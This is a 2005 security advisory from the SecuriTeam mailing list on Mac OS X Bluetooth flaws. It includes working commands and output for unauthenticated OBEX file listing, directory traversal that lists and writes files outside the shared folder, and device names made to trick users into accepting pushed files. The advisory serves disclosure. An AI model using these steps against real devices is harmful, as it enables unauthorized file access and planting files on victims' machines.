[NEWS] Apple OS X Multiple Bluetooth Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 05/04/05
- Previous message: SecuriTeam: "[NT] ActivePost Standard Password Disclosure, Directory Traversal and DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 4 May 2005 18:16:09 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Apple OS X Multiple Bluetooth Vulnerabilities
------------------------------------------------------------------------
SUMMARY
Starting with Mac OSX 10.2 Apple decided to include support for Bluetooth
devices. Apple's Bluetooth Software Technology Preview was also available
for a brief period of time on Mac OSX 10.1.4. With the Bluetooth
technology that is integrated in Mac OS X, you can easily connect your
Apple computer with your Palm OS-based handheld device, mobile phone and
other peripherals with Bluetooth technology.
In addition to the new PowerBook G4 portable line, Bluetooth-enabled
computers are available across Apple's entire CPU product line, including
iBook, iMac G5, eMac, Mac mini and Power Mac G5. Bluetooth is available in
some cases as a standard feature and in others as an addon option. You can
even enable your previous-generation iBook, iMac or Power Mac by simply
plugging in a Bluetooth USB Adapter and letting Mac OSX takes care of the
rest.
Apple OS X's Bluetooth file exchange service is enabled by default on
systems with Bluetooth capability. This could allow files to be shared
without properly notifying the user. In addition, the default directory
for file sharing may be used by other applications, leading to
unintentional file sharing.
DETAILS
Vulnerable Systems:
* Mac OSX version 10.3.9 and prior
The Apple bluetooth implementation's default behavior is that the OBEX FTP
service allowed access to the /Users/Shared directory and it did not
require any sort of user authentication. In addition to it being enabled
by default once a user had logged into the machine.
The following output demonstrates the ability to view files located in
/Users/Shared:
animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7
-l
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<folder name="Faxes" created="19961103T141500Z" size="0"/>
<folder name="New Folder" created="19961103T141500Z" size="0"/>
<folder name="SC Info" created="19961103T141500Z" size="0"/>
</folder-listing>
Further, it appears that several applications use /Users/Shared as a
config file repository. For example it was found that GarageBand, Quicken,
Microsoft RDP client, Blizzard World of Warcraft and iTunes dumped random
files into /Users/Shared. Even 'SC Info.sidb' aka the iTunes database of
decryption keys are stored under this directory available for grabbing
over Bluetooth.
In addition to being able to browse the files located in /Users/Shared you
also have the ability to place files onto the machine in the same
directory. This may for example allow you to place potentially offensive
or illegal material onto an individuals computer.
Aside from offering OBEX File Transfer OSX the bluetooth interface offers
OBEX Object Push services. Object push is usually used for passing
business cards to other Bluetooth users. The object push has an option
called "Folder for Accepted Items". Under normal circumstances all files
should be dropped into this directory, however this restriction is can be
bypassed. OBEX Object Push services appears to be vulnerable to a
directory transversal attack.
The first step is obviously to check what channel OPUSH is on.
animosity:/home/kfinisterre# sdptool browse 00:11:B1:07:BE:A7
Browsing 00:11:B1:07:BE:A7 ...
Service Name: Bluetooth-PDA-Sync
Service RecHandle: 0x10004
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Serial Port" (0x1101)
Version: 0x0100
Service Name: OBEX Object Push
Service RecHandle: 0x10002
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 10
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100
Service Name: OBEX File Transfer
Service RecHandle: 0x10003
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100
Fire up an rfcomm connection.
animosity:/home/kfinisterre# rfcomm connect 0 00:11:B1:07:BE:A7 10
Connected /dev/rfcomm0 to 00:11:B1:07:BE:A7 on channel 10
Press CTRL-C for hangup
Drop a file in /tmp.
kfinisterre@animosity:~/ussp-push-0.3$ ./ussp-push /dev/rfcomm0 /etc/hosts
./../../../../../../../../tmp/blah
pushing file /etc/hosts
name=/etc/hosts, size=257
Registered transport
set user data
created new objext
started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!
Connection return code: 0, id: 0
Connection established
connected to server
Sending file: ../../../../../../../../../tmp/blah, path: /etc/hosts, size:
257
At this point the Mac user is prompted by a window with the title
'Incoming File Transfer'. The options are to 'Decline' or 'Accept' with
the ability to also 'Accept all without warning' by clicking a check box.
There is a bluetooth icon with the device name of the connecting machine.
The device name information is even more useful as it can be used to
induce the user to click on the 'Accept' button.
Consider the following as an example:
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Sexy*Blonde*5*tables*over
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Critical*Apple*Bluetooth*Update
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Apple*Update*Please*Click*Accept
Luckily for an attacker only the basename() form of the file being
transfered is shown. In the above example all we would see is 'blah' as
the incoming filename. Odds are that most 'toothy' males would accept any
file from the Sexy Blonde 5 tables over.
After you coax the user to accept the file either via clicking 'Accept' or
pressing enter the above it will promptly be dropped in /tmp.
Kevin-Finisterres-Computer:~kevinfinisterre$ ls /tmp
501 blah mcx_compositor
In addition to the above vulnerabilities, the OBEX File Transfer service
is also vulnerable to directory transversal.
animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7
-l -c ../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<file name="4D WebSTAR Installer.log" created="19961103T141500Z"
size="195662"/>
<folder name="johnh" created="19961103T141500Z" size="0"/>
<folder name="kevinfinisterre" created="19961103T141500Z" size="0"/>
<folder name="Shared" created="19961103T141500Z" size="0"/>
<folder name="webstar" created="19961103T141500Z" size="0"/>
</folder-listing>
animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7
-l -c ../../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<folder name="Applications" created="19961103T141500Z" size="0"/>
<folder name="automount" created="19961103T141500Z" size="0"/>
<folder name="bin" created="19961103T141500Z" size="0"/>
<folder name="cores" created="19961103T141500Z" size="0"/>
<file name="Desktop DB" created="19961103T141500Z" size="3584"/>
<file name="Desktop DF" created="19961103T141500Z" size="4482"/>
<folder name="dev" created="19961103T141500Z" size="0"/>
<folder name="Developer" created="19961103T141500Z" size="0"/>
<file name="etc" created="19961103T141500Z" size="11"/>
<folder name="Library" created="19961103T141500Z" size="0"/>
<file name="mach" created="19961103T141500Z" size="9"/>
<file name="mach.sym" created="19961103T141500Z" size="570532"/>
<file name="mach_kernel" created="19961103T141500Z" size="3863716"/>
<folder name="Network" created="19961103T141500Z" size="0"/>
<folder name="private" created="19961103T141500Z" size="0"/>
<folder name="sbin" created="19961103T141500Z" size="0"/>
<folder name="System" created="19961103T141500Z" size="0"/>
<file name="tmp" created="19961103T141500Z" size="11"/>
<folder name="Users" created="19961103T141500Z" size="0"/>
<folder name="usr" created="19961103T141500Z" size="0"/>
<file name="var" created="19961103T141500Z" size="11"/>
<folder name="Volumes" created="19961103T141500Z" size="0"/>
</folder-listing>
Disclosure Timeline:
Thu, 10 Mar 2005 Follow-up: 7841131 assigned by auto ticketing sytem.
Sat, 12 Mar 2005 dispute usage of /Users/Shared with bluetooth with Apple.
Thu, 17 Mar 2005 Apple is 'still investigating this issue'. Introduce
greenplaque to Apple.
Sat, 19 Mar 2005 Justin Tibbs (jay ex tizzle) pointed out World of
Warcraft uses /Users/Shared
Sat, 19 Mar 2005 JxT and KF discover and report that iTunes leaves its
auth db in /Users/Shared
Sun, 20 Mar 2005 OBEX Object Push directory transversal issues discovered
and reported.
Mon, 04 Apr 2005 OBEX File transfer daemon flaws and reported
Sat, 09 Apr 2005 More Apple followups
Thu, 23 Apr 2005 AppleSeed testing begins
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1332>
CAN-2005-1332
ADDITIONAL INFORMATION
The information has been provided by
<mailto:kf_lists@digitalmunition.com> KF.
The original article can be found at:
<http://www.digitalmunition.com/DMA[2005-0502a].txt>
http://www.digitalmunition.com/DMA[2005-0502a].txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] ActivePost Standard Password Disclosure, Directory Traversal and DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
